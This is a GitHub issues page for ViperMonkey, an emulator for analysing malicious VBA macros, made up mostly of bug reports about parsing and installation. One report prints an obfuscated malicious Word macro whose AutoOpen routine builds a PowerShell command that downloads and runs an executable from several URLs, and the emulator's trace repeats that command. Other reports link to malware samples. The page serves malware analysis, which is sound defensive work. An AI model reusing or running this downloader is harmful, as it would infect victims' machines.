decalage2 / vipermonkey Goto Github PK
View Code? Open in Web Editor NEWA VBA parser and emulation engine to analyze malicious macros.
vipermonkey's People
Contributors
Stargazers
Watchers
Forkers
lucabongiorni wflk williamgibb dafyddcrosby h4rry jack51706 wroersma cocaman newdominic tun4 antonini dipsec lastpixl den-run-ai deki0r nsxz diggold avgirl 453483289 secretnonempty rootjacker vulcanoio khoanx jeperez techlord-rce m00zh33 alex-dengx johnhubcr mellven darkoperator kbahaxor securityresearchstaff h0k5 deelmind uruscg-llc zaza6677 zyxtarmo cryzlasm loquat genericcx anyrun kirk-sayre-work mustafakisa jacobiusg qqvirus peterg75 lukw00heck dougthompson1976 sgnls youngjun-chang brianwgray jpsnyder haga5 idkwim seth1002 r3dfruitrollup emf ronull neilbryant bonda007 maijin import-au dekoder binlmmhc jk-livongo gregcopenhaver r0ug3 asorourx er28-0652 sasqwatch vxsh4d0w l9sk theshiv303 shaiful-systema modulexcite pweigle unk0unk0unk0 dod-cyber-crime-center maurice-schuppe irjohns marciopocebon ayzrxx1 s0lari netzrenner bajaguy ananan fstfwd minhtranca thezedwards zaddach n3m351d4 fzxcp3 casping chubbymaggie zhaoshiling1017 reversetools 1r0dm480 blue-infosec sswares 5l1v3r1vipermonkey's Issues
improve install instructions for Linux
ViperMonkey tests
I think this project would greatly benefit from tests see https://travis-ci.org/ same for olevba to ensure no regressions are introduced over-time.
Cannot read document variables
Describe the bug
ERROR Cannot read document variables. [Errno 2] No such file or directory: '1b2a9b3e9405c55a6b4d48bb77226c53'
ERROR Cannot read custom doc properties. [Errno 2] No such file or directory: '1b2a9b3e9405c55a6b4d48bb77226c53'
ERROR Cannot read document text from 1b2a9b3e9405c55a6b4d48bb77226c53. [Errno 2] No such file or directory: '1b2a9b3e9405c55a6b4d48bb77226c53'
ERROR Cannot read form strings. 'VBA_Parser' object has no attribute 'extract
Desktop (please complete the following information):
- OS: Win7 - 32bit
Additional context
Module None
Sub CgCydi ([wUtzAWZ as Integer]): 13 statement(s)
Sub YNTfFJ ([lmCgoO as String, OZLWlnM as Boolean, vVFKdxx as Boolean, DpvoKQas String, SncUfb as Boolean]): 13 statement(s)
Function vwjVsi ([PRbGUQ as String, AHUOzN as Boolean]): 14 statement(s)
ERROR Cannot read document variables. [Errno 2] No such file or directory: '1b2a9b3e9405c55a6b4d48bb77226c53'
ERROR Cannot read custom doc properties. [Errno 2] No such file or directory: '1b2a9b3e9405c55a6b4d48bb77226c53'
ERROR Cannot read document text from 1b2a9b3e9405c55a6b4d48bb77226c53. [Errno 2] No such file or directory: '1b2a9b3e9405c55a6b4d48bb77226c53'
ERROR Cannot read form strings. 'VBA_Parser' object has no attribute 'extract
_form_strings_extended'
Traceback (most recent call last):
File "c:\Python27\lib\site-packages\vipermonkey-0.7-py2.7.egg\vipermonkey\vmonkey.py", line 773, in process_file
for (subfilename, stream_path, form_variables) in vba.extract_form_strings_extended():
AttributeError: 'VBA_Parser' object has no attribute 'extract_form_strings_extended'
Traceback (most recent call last):
File "c:\Python27\lib\site-packages\vipermonkey-0.7-py2.7.egg\vipermonkey\vmonkey.py", line 828, in process_file raise e
AttributeError: 'VBA_Parser' object has no attribute 'extract_form_strings_extended'
Working Docker version with colorlog?
Hi,
Anyone have good Dockerfile for Vipermonkey?
I have issues with Colorlog
importerror: no module named colorlog but it's satisified?
Missing dependency
vmonkey.py imports (and, therefore, depends on) olefile but the latter is missing both from requirements.txt and from setup.py. Consider adding it there.
parsing error - several type definitions on one line
Error when parsing this sample: https://app.any.run/tasks/d6050bc0-4084-4e8f-92b8-ad2eb9fe59c1
source: https://twitter.com/cybercdh/status/1030121638556323842
Version: vmonkey 0.07 on Windows 10, python 2.7.14
From the error message below, it looks like the cause is two type definitions on the same line, separated by a colon.
-------------------------------------------------------------------------------
PARSING VBA CODE:
Module None
Private Type QEkuzinRWhPUgNzqXlLhMSYvHI: DmcfgZEbnpoKfUMVWmhkuEuqhLgMPw As Long: JRhVAdfHnjGJqZhgVQIxX As Long: rSYbcxCuiXxWxSllDvWHbHTqct As Long: gEYXaoxvmcKeChxhIFQC As Long: End Type: Private Type HlQRRmytCbMfFVvXyeGhnerWF: CrhVlVetNDAcbosudRmuRY As Long: sYHEoxAXpTwaSoGgKPUroGy As Long: iTLHNtUwgPkRXFjGPBCCJhq As Long: fuYwEnEbZfgGdDmVksgQkBqISRj As Long: ZfnJfdGAinanoOPEzLEJphh As Long: spKZVRkkVTgkmEeJjCMrDWbiogV As Long: ZfnJfdGAinanoOPEzLEJphhSize As Long: spKZVRkkVTgkmEeJjCMrDWbiogVSize As Long: ZfnJfdGAinanoOPEzLEJphhCountChars As Long: spKZVRkkVTgkmEeJjCMrDWbiogVCountChars As Long: sfcAepyfrwIaQSSZECZntsbH As Long: TLaCnKPQbSqsxRtypRZNnnTo As Long: gKeJXmuWxXRgZogwXSIGWCVs As Integer: CrhVlVetNDAcbosudRmuRYReserved2 As Integer: sYHEoxAXpTwaSoGgKPUroGy2 As Byte: hvtTXNAVBFpldXbJzBXiQmQHHAMfMy As Long: MaKlFtENCqZEgeJtfQFgcFX As Long: TqsKAKvLCqbNIvYUhQcnkP As Long: End Type
^
Expected end of text (at char 186), (line:1, col:187)
Parse Error. Processing Aborted.
vmonkey - extract IOCs from method calls using olevba
Allow object export
Would be very helpful if there was an option to export an object. For example, in this sample, there is encrypted shellcode that the vb decrypts and then loads into memory. Would be very helpful if there was a was to export the decrypted shellcode for further analysis.
https://drive.google.com/open?id=0B2Z9rdMdDr0OZ0VPbll0RUZqZzg
ViperMonkey can't parse array well
Of course,ViperMonkey is so good,but it also needs some improvement.
ViperMonkey doesn't support array assignment. And '( )' means function in python,but it may be array in VBA.It is important to solve the problem of parsing array.
"Expected end of text" Parsing Error
Getting the "Expected end of text" exception. I am working on running this down myself but figured you might be able to get it done faster.
PARSING VBA CODE:
DEBUG parsed Attribute VB_Name = 'ThisDocument'
DEBUG parsed Attribute VB_Base = '1Normal.ThisDocument'
DEBUG parsed Attribute VB_GlobalNameSpace = False
DEBUG parsed Attribute VB_Creatable = False
DEBUG parsed Attribute VB_PredeclaredId = True
DEBUG parsed Attribute VB_Exposed = True
DEBUG parsed Attribute VB_TemplateDerived = True
DEBUG parsed Attribute VB_Customizable = True
DEBUG parsed Option Explicit
DEBUG parsed Dim "(['DhuBaoK'], {})"
DEBUG parsed LebuGNcc4
DEBUG parsed qLkz_Rm
DEBUG parsed hpwy02E
DEBUG parsed DhuBaoK as SimpleNameExpression
DEBUG parsed LebuGNcc4.Run as SimpleNameExpression
DEBUG parsed Let DhuBaoK = LebuGNcc4.Run
Module 'ThisDocument'
*** PARSING ERROR ***
Function yza5b9ccHV(ByVal LebuGNcc4, ByVal qLkz_Rm, ByVal hpwy02E)
^
Expected end of text (at char 317), (line:12, col:1)
Here is the macro:
macro.txt
Alternate VBA parser working line by line
the parser should be more robust and perhaps quicker, if it parsed each line separately. If parsing a line fails, then it should be recorded as "unsupported statement" and ignored during emulation.
Then a second stage would identify the block structures (subs, loops, etc), instead of implementing them in the pyparsing grammar.
Another advantage is that it would be easier to map parsing errors to actual lines for debugging.
VBA Format() function missing? (includes workaround patch)
A VBA obfuscation found in the wild uses the construct:
Format(Chr(3 + 10 + 5 + 5 + 44)) or
Format(Chr(5 + 14 + 8 + 7 + 65)) to represent the characters "C" and "c", respectively.
VMonkey 0.07 drops this character from string reassemblies, due to not supporting Format()?
INFO calling Function: Format('C')
WARNING Function 'Format' not found
output dump of the run is
$ vmonkey dd0adccad0039f61c953ff7014f8c8aea50df0cf
_ ___ __ ___ __
| | / (_)___ ___ _____/ |/ /___ ____ / /_____ __ __
| | / / / __ \/ _ \/ ___/ /|_/ / __ \/ __ \/ //_/ _ \/ / / /
| |/ / / /_/ / __/ / / / / / /_/ / / / / ,< / __/ /_/ /
|___/_/ .___/\___/_/ /_/ /_/\____/_/ /_/_/|_|\___/\__, /
/_/ /____/
vmonkey 0.07 - https://github.com/decalage2/ViperMonkey
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/ViperMonkey/issues
===============================================================================
FILE: dd0adccad0039f61c953ff7014f8c8aea50df0cf
-------------------------------------------------------------------------------
VBA MACRO EwiAcaJrEiEa.cls
in file: dd0adccad0039f61c953ff7014f8c8aea50df0cf - OLE stream: u'Macros/VBA/EwiAcaJrEiEa'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
Sub AutoOpen()
On Error Resume Next
Dim SXpODS()
ReDim SXpODS(3)
SXpODS(0) = 93
SXpODS(1) = 8992
SXpODS(2) = 9459
Dim nfbmc()
ReDim nfbmc(3)
nfbmc(0) = 293675403
nfbmc(1) = 7
nfbmc(2) = 702
Dim hYjPi()
ReDim hYjPi(3)
hYjPi(0) = 93
hYjPi(1) = 5
hYjPi(2) = 1976
Dim jWQjS()
ReDim jWQjS(4)
jWQjS(0) = 17
jWQjS(1) = 303
jWQjS(2) = 982
jWQjS(3) = 9
Dim OapZu()
ReDim OapZu(5)
OapZu(0) = 2
OapZu(1) = 9
OapZu(2) = 98834684
OapZu(3) = 55210411
OapZu(4) = 91
Dim kWsjP()
ReDim kWsjP(4)
kWsjP(0) = 7408
kWsjP(1) = 321
kWsjP(2) = 9
kWsjP(3) = 312
Dim pzhPSF()
ReDim pzhPSF(5)
pzhPSF(0) = 3
pzhPSF(1) = 414933890
pzhPSF(2) = 89
pzhPSF(3) = 962
pzhPSF(4) = 9
Shell@ LTuzuiQ + KZbIqrscsDqR + nqLzrRwnOzbkp, Format(0)
Dim SJcYtF()
ReDim SJcYtF(2)
SJcYtF(0) = 6913
SJcYtF(1) = 65
End Sub
-------------------------------------------------------------------------------
PARSING VBA CODE:
INFO parsed Sub AutoOpen (): 47 statement(s)
Module None
Sub AutoOpen (): 47 statement(s)
-------------------------------------------------------------------------------
VBA MACRO FzniJjjRVH.bas
in file: dd0adccad0039f61c953ff7014f8c8aea50df0cf - OLE stream: u'Macros/VBA/FzniJjjRVH'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
Function LTuzuiQ()
On Error Resume Next
Dim irbnC()
ReDim irbnC(2)
irbnC(0) = 2
irbnC(1) = 58
Dim QvZWJ()
ReDim QvZWJ(3)
QvZWJ(0) = 33
QvZWJ(1) = 72780562
QvZWJ(2) = 8
Dim AzHhc()
ReDim AzHhc(5)
AzHhc(0) = 6
AzHhc(1) = 392230015
AzHhc(2) = 8
AzHhc(3) = 9014
AzHhc(4) = 75197952
Dim XtDsl()
ReDim XtDsl(5)
XtDsl(0) = 63625617
XtDsl(1) = 8
XtDsl(2) = 5
XtDsl(3) = 823
XtDsl(4) = 9
OBijuHBFaLa = Format(Chr(5 + 14 + 8 + 7 + 65)) + "md /V:/" + Format(Chr(3 + 10 + 5 + 5 + 44)) + Format(Chr(1 + 4 + 2 + 2 + 25)) + "^s^et l" + "^e= ^ ^ ^ ^ " + " ^}}" + "^{h" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^t^a" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^};^k^a^er^" + "b^;" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "ia^$^ me^tI^-ek"
Dim MvTTn()
ReDim MvTTn(5)
MvTTn(0) = 997
MvTTn(1) = 2
MvTTn(2) = 409
MvTTn(3) = 9
MvTTn(4) = 8054
Dim TtCpY()
ReDim TtCpY(5)
TtCpY(0) = 517402771
TtCpY(1) = 299854020
TtCpY(2) = 91
TtCpY(3) = 5305
TtCpY(4) = 143
Dim uXRIj()
ReDim uXRIj(4)
uXRIj(0) = 350
uXRIj(1) = 34
uXRIj(2) = 640
uXRIj(3) = 385980877
Dim OjdDA()
ReDim OjdDA(5)
OjdDA(0) = 98889860
OjdDA(1) = 971
OjdDA(2) = 24
OjdDA(3) = 2
OjdDA(4) = 3998
rFqkiY = "^ovn^I^;)" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "ia^$" + "^ ,^j^p^X$(^el" + "iF^d^a^o^lnw^o^D.^w^u^I${^y" + "rt^{)ZXn$ ni^ ^j^pX$" + "(h" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^a^er^of^;'^" + "e^xe.'^+^O^U^I$+^'^\^'+" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^" + "i^lbup:vne$^=" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "^ia$^" + ";^'093'^ ^= O^UI$^" + ";)'@'(tilp^S^.'J2b6^B/^tn^etn" + "o" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^-^pw/r^"
Dim tZnGwA()
ReDim tZnGwA(4)
tZnGwA(0) = 878
tZnGwA(1) = 167883523
tZnGwA(2) = 3977
tZnGwA(3) = 257
zUhDioazMp = "k^.o" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^.^y^ar^t^i//^:p" + "^tth@A^" + "A" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "57^Bj/ur." + Format(Chr(5 + 14 + 8 + 7 + 65)) + "i^t^s" + "i^go^lk^ta" + "//^:^pt^th@l"
Dim rIzjH()
ReDim rIzjH(5)
rIzjH(0) = 15
rIzjH(1) = 85
rIzjH(2) = 222341352
rIzjH(3) = 774
rIzjH(4) = 15414680
Dim nWPYh()
ReDim nWPYh(2)
nWPYh(0) = 7
nWPYh(1) = 9917
Dim hjSSnC()
ReDim hjSSnC(4)
hjSSnC(0) = 8
hjSSnC(1) = 3925
hjSSnC(2) = 272
hjSSnC(3) = 971
Dim hiGHL()
ReDim hiGHL(3)
hiGHL(0) = 1819
hiGHL(1) = 7321
hiGHL(2) = 3
Dim GbGfr()
ReDim GbGfr(3)
GbGfr(0) = 174
GbGfr(1) = 94
GbGfr(2) = 11
Dim fwQjB()
ReDim fwQjB(3)
fwQjB(0) = 59130641
fwQjB(1) = 72
fwQjB(2) = 62
pWfpdNuIl = "^0^k5/^s^d" + "a^o^l^pu/tne^tno" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "-pw/ra^." + "u^d^e^.pl^u.sa^moi^" + "d^ie^do" + "tut^itsn^i//^:^p^t^" + "th@4p2u^Z01/^m^o" + Format(Chr(5 + 14 + 8 + 7 + 65)) + ".^ov^it^isopro^lav//:^ptt" + "^h^@j^A^" + "M^2U/^ur^.ely^" + "t^snusbd//^:ptth'^=^Z^Xn$^;^t"
Dim jwJMh()
ReDim jwJMh(5)
jwJMh(0) = 350988871
jwJMh(1) = 54
jwJMh(2) = 2
jwJMh(3) = 352674196
jwJMh(4) = 24
Dim UKQvML()
ReDim UKQvML(4)
UKQvML(0) = 5
UKQvML(1) = 60
UKQvML(2) = 318547392
UKQvML(3) = 87
Dim GilGm()
ReDim GilGm(5)
GilGm(0) = 8
GilGm(1) = 5
GilGm(2) = 799
GilGm(3) = 871
GilGm(4) = 82
Dim tiPpu()
ReDim tiPpu(2)
tiPpu(0) = 7
tiPpu(1) = 73
CcZXXktaIj = "neil" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "beW.^teN^ t" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^e" + "^jbo-^wen=^w^u^I^$^" + " ^l^l^eh^sr^ewo^p&&^f^o" + "r /^L %^W ^in (" + "^396^;-^" + "1;^0)d^o ^s^e^t ^M" + "G^U=!^MG^U!!l^e:~%^W,1!&&^i^f" + " %^W e^q^u ^0 " + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^a^l^" + "l %^MG^U:^*^M^G" + "^U!^=%" + Format(Chr(1 + 4 + 2 + 2 + 25)) + ""
LTuzuiQ = OBijuHBFaLa + rFqkiY + zUhDioazMp + pWfpdNuIl + CcZXXktaIj
Dim cpBuji()
ReDim cpBuji(2)
cpBuji(0) = 6
cpBuji(1) = 146
Dim wDszIX()
ReDim wDszIX(4)
wDszIX(0) = 462538301
wDszIX(1) = 225457549
wDszIX(2) = 9
wDszIX(3) = 20
End Function
-------------------------------------------------------------------------------
PARSING VBA CODE:
INFO parsed Function LTuzuiQ (): 129 statement(s)
Module None
Function LTuzuiQ (): 129 statement(s)
-------------------------------------------------------------------------------
TRACING VBA CODE (entrypoint = Auto*):
INFO ACTION: Found Entry Point - params 'autoopen' -
INFO evaluating Sub AutoOpen
ERROR chr() arg not in range(256)
ERROR 8992 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 9459 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 293675403 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 702 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 1976 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 303 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 982 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 98834684 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 55210411 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 7408 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 321 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 312 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 414933890 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 962 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 72780562 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 392230015 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 9014 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 75197952 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 63625617 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 823 cannot be converted to ASCII.
INFO calling Function: Format('c')
WARNING Function 'Format' not found
INFO calling Function: Format('C')
WARNING Function 'Format' not found
INFO calling Function: Format('"')
WARNING Function 'Format' not found
INFO calling Function: Format('c')
WARNING Function 'Format' not found
INFO calling Function: Format('c')
WARNING Function 'Format' not found
INFO calling Function: Format('C')
WARNING Function 'Format' not found
ERROR chr() arg not in range(256)
ERROR 997 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 409 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 8054 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 517402771 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 299854020 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 5305 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 350 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 640 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 385980877 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 98889860 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 971 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 3998 cannot be converted to ASCII.
INFO calling Function: Format('C')
WARNING Function 'Format' not found
INFO calling Function: Format('c')
WARNING Function 'Format' not found
INFO calling Function: Format('c')
WARNING Function 'Format' not found
INFO calling Function: Format('C')
WARNING Function 'Format' not found
INFO calling Function: Format('c')
WARNING Function 'Format' not found
ERROR chr() arg not in range(256)
ERROR 878 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 167883523 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 3977 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 257 cannot be converted to ASCII.
INFO calling Function: Format('c')
WARNING Function 'Format' not found
INFO calling Function: Format('C')
WARNING Function 'Format' not found
INFO calling Function: Format('c')
WARNING Function 'Format' not found
ERROR chr() arg not in range(256)
ERROR 222341352 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 774 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 15414680 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 9917 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 3925 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 272 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 971 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 1819 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 7321 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 59130641 cannot be converted to ASCII.
INFO calling Function: Format('c')
WARNING Function 'Format' not found
INFO calling Function: Format('c')
WARNING Function 'Format' not found
ERROR chr() arg not in range(256)
ERROR 350988871 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 352674196 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 318547392 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 799 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 871 cannot be converted to ASCII.
INFO calling Function: Format('C')
WARNING Function 'Format' not found
INFO calling Function: Format('c')
WARNING Function 'Format' not found
INFO calling Function: Format('c')
WARNING Function 'Format' not found
INFO calling Function: Format('"')
WARNING Function 'Format' not found
ERROR chr() arg not in range(256)
ERROR 462538301 cannot be converted to ASCII.
ERROR chr() arg not in range(256)
ERROR 225457549 cannot be converted to ASCII.
WARNING Variable 'KZbIqrscsDqR' not found
WARNING Variable 'nqLzrRwnOzbkp' not found
INFO calling Function: Format(0)
WARNING Function 'Format' not found
INFO Calling Procedure: Shell('["md /V:/^s^et l^e= ^ ^ ^ ^ ^}}^{h^t^a^};^k^a^er^b^;ia^$^ me^tI^-ek^...')
INFO Shell("md /V:/^s^et l^e= ^ ^ ^ ^ ^}}^{h^t^a^};^k^a^er^b^;ia^$^ me^tI^-ek^ovn^I^;)ia^$^ ,^j^p^X$(^eliF^d^a^o^lnw^o^D.^w^u^I${^yrt^{)ZXn$ ni^ ^j^pX$(h^a^er^of^;'^e^xe.'^+^O^U^I$+^'^\\^'+^i^lbup:vne$^=^ia$^;^'093'^ ^= O^UI$^;)'@'(tilp^S^.'J2b6^B/^tn^etno^-^pw/r^k^.o^.^y^ar^t^i//^:p^tth@A^A57^Bj/ur.i^t^si^go^lk^ta//^:^pt^th@l^0^k5/^s^da^o^l^pu/tne^tno-pw/ra^.u^d^e^.pl^u.sa^moi^d^ie^dotut^itsn^i//^:^p^t^th@4p2u^Z01/^m^o.^ov^it^isopro^lav//:^ptt^h^@j^A^M^2U/^ur^.ely^t^snusbd//^:ptth'^=^Z^Xn$^;^tneilbeW.^teN^ t^e^jbo-^wen=^w^u^I^$^ ^l^l^eh^sr^ewo^p&&^f^or /^L %^W ^in (^396^;-^1;^0)d^o ^s^e^t ^MG^U=!^MG^U!!l^e:~%^W,1!&&^i^f %^W e^q^u ^0 ^a^l^l %^MG^U:^*^M^G^U!^=%")
INFO ACTION: Execute Command - params "md /V:/^s^et l^e= ^ ^ ^ ^ ^}}^{h^t^a^};^k^a^er^b^;ia^$^ me^tI^-ek^ovn^I^;)ia^$^ ,^j^p^X$(^eliF^d^a^o^lnw^o^D.^w^u^I${^yrt^{)ZXn$ ni^ ^j^pX$(h^a^er^of^;'^e^xe.'^+^O^U^I$+^'^\\^'+^i^lbup:vne$^=^ia$^;^'093'^ ^= O^UI$^;)'@'(tilp^S^.'J2b6^B/^tn^etno^-^pw/r^k^.o^.^y^ar^t^i//^:p^tth@A^A57^Bj/ur.i^t^si^go^lk^ta//^:^pt^th@l^0^k5/^s^da^o^l^pu/tne^tno-pw/ra^.u^d^e^.pl^u.sa^moi^d^ie^dotut^itsn^i//^:^p^t^th@4p2u^Z01/^m^o.^ov^it^isopro^lav//:^ptt^h^@j^A^M^2U/^ur^.ely^t^snusbd//^:ptth'^=^Z^Xn$^;^tneilbeW.^teN^ t^e^jbo-^wen=^w^u^I^$^ ^l^l^eh^sr^ewo^p&&^f^or /^L %^W ^in (^396^;-^1;^0)d^o ^s^e^t ^MG^U=!^MG^U!!l^e:~%^W,1!&&^i^f %^W e^q^u ^0 ^a^l^l %^MG^U:^*^M^G^U!^=%" - Shell function
ERROR chr() arg not in range(256)
ERROR 6913 cannot be converted to ASCII.
Recorded Actions:
+-------------------+---------------------------+----------------+
| Action | Parameters | Description |
+-------------------+---------------------------+----------------+
| Found Entry Point | autoopen | |
| Execute Command | md /V:/^s^et l^e= ^ ^ | Shell function |
| | ^ ^ ^}}^{h^t^a^}; | |
| | ^k^a^er^b^;ia^$^ | |
| | me^tI^-ek^ovn^I^;)ia^$^ , | |
| | ^j^p^X$(^eliF^d^a^o^lnw^o | |
| | ^D.^w^u^I${^yrt^{)ZXn$ | |
| | ni^ ^j^pX$(h^a^er^of^;'^e | |
| | ^xe.'^+^O^U^I$+^'^\^'+^i^ | |
| | lbup:vne$^=^ia$^;^'093'^ | |
| | ^= O^UI$^;)'@'(tilp^S^.'J | |
| | 2b6^B/^tn^etno^-^pw/r^k^. | |
| | o^.^y^ar^t^i//^:p^tth@A^A | |
| | 57^Bj/ur.i^t^si^go^lk^ta/ | |
| | /^:^pt^th@l^0^k5/^s^da^o^ | |
| | l^pu/tne^tno-pw/ra^.u^d^e | |
| | ^.pl^u.sa^moi^d^ie^dotut^ | |
| | itsn^i//^:^p^t^th@4p2u^Z0 | |
| | 1/^m^o.^ov^it^isopro^lav/ | |
| | /:^ptt^h^@j^A^M^2U/^ur^.e | |
| | ly^t^snusbd//^:ptth'^=^Z^ | |
| | Xn$^;^tneilbeW.^teN^ | |
| | t^e^jbo-^wen=^w^u^I^$^ | |
| | ^l^l^eh^sr^ewo^p&&^f^or | |
| | /^L %^W ^in | |
| | (^396^;-^1;^0)d^o ^s^e^t | |
| | ^MG^U=!^MG^U!!l^e:~%^W,1! | |
| | &&^i^f %^W e^q^u ^0 | |
| | ^a^l^l | |
| | %^MG^U:^*^M^G^U!^=% | |
+-------------------+---------------------------+----------------+
No module named colorlog
Describe the bug
$ python2.7 vmonkey.py
Traceback (most recent call last):
File "vmonkey.py", line 98, in <module>
import colorlog
ImportError: No module named colorlog
To Reproduce
Followed instructions in README to setup vmonkey:
Downloaded release
unzip ViperMonkey-master.zip
cd ViperMonkey-master
sudo python2.7 setup.py install
sudo pip install -U -r requirements.txt
Requirement already satisfied: oletools in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 1))
Requirement already satisfied: prettytable in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 2))
Requirement already satisfied: colorlog in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 3))
Requirement already satisfied: colorama in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 4))
Requirement already satisfied: pyparsing in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 5))
Requirement already satisfied: antlr4-python2-runtime in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 6))
cd vipermonkey
python2.7 vmonkey.py
Expected behavior
Anything but that
Screenshots
N/A
Desktop (please complete the following information):
- OS: Ubuntu 16.04.5 (SIFT Workstation)
- Python Version 2.7
Additional context
Tried with pypy, receive a different error about unidecode, posted in a different issue.
Fails to run from $PATH
aphrodite@cleopatra:~$ vmonkey.py /var/cache/mail/F43942_7777204.docm
Traceback (most recent call last):
File "/usr/local/bin/vmonkey.py", line 4, in
import('pkg_resources').run_script('vipermonkey==0.02', 'vmonkey.py')
File "/usr/lib/python2.7/dist-packages/pkg_resources.py", line 534, in run_script
self.require(requires)[0].run_script(script_name, ns)
File "/usr/lib/python2.7/dist-packages/pkg_resources.py", line 1445, in run_script
exec(script_code, namespace, namespace)
File "/usr/local/lib/python2.7/dist-packages/vipermonkey-0.02-py2.7.egg/EGG-INFO/scripts/vmonkey.py", line 95, in
ImportError: No module named core
I can run it from my clone of the git repository, but the setup.py results seem to be borked. Version info:
3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt25-2+deb8u3 (2016-07-02) x86_64 GNU/Linux
Python3: 3.4.2, Python2: 2.7.9 (default)
sample using form value to break emulation
This sample seems to use a form with a text box event to avoid detection. Need to check if this is handled by ViperMonkey or needs improvement:
https://twitter.com/DissectMalware/status/999680382399385601
Strip option removes useful statements
Using the -s option means the sample I'm looking at isn't parsed as well. Without stripping the Application.Run() command is found, with stripping it isn't.
To Reproduce
Dridex sample I'm testing is here: http://malwaretech.com/downloads/dridex.zip
I extracted the VBA macro into a seperate .vba file using oledump, hosted on Pastebin.
Compare the results of the two commands:
python vmonkey.py ./dridex.vba
python vmonkey.py -s ./dridex.vba
Expected behavior
To have the same analysis, with the stripped one obviously having less statements if they are genuinely useless.
Screenshots
Screenshot of stripped (worse) output
Screenshot of the non-stripped (better) output
Desktop (please complete the following information):
- Linux, remnux-6.0, latest updates
vmonkey - implement all known entry points including ActiveX events
See olevba/mraptor and http://www.greyhathacker.net/?p=948
Eval error
When running against the sample here (http://pastebin.com/7Pp2p7Yg), I get the below error. I have tried against several different samples, and always get the same result.
EVALUATED VBA EXPRESSIONS:
Traceback (most recent call last):
File "./vmonkey.py", line 215, in process_file_scanexpr
for expression, expr_eval in scan_expressions(all_code):
File "/home/tbearden/bin/tools/malware/ViperMonkey/vipermonkey/core/init.py", line 205, in scan_expressions
yield (e, e.eval())
TypeError: eval() takes at least 2 arguments (1 given)
Am I missing some requirement? or just running through weird samples?
Make vmonkey installable by pip
- make sure vmonkey can be imported and used with an API
- upload to PyPI
setup.py: add install_requires
parsing error
sample: https://twitter.com/malware_traffic/status/1088470325103419393
error: https://twitter.com/Ledtech3/status/1089211971113811969
Note: this is a parsing error, the Excel parsing error is not the cause.
Possible Typo
You have the following in the vmonkey.py code: #!/usr/bin/env pyp
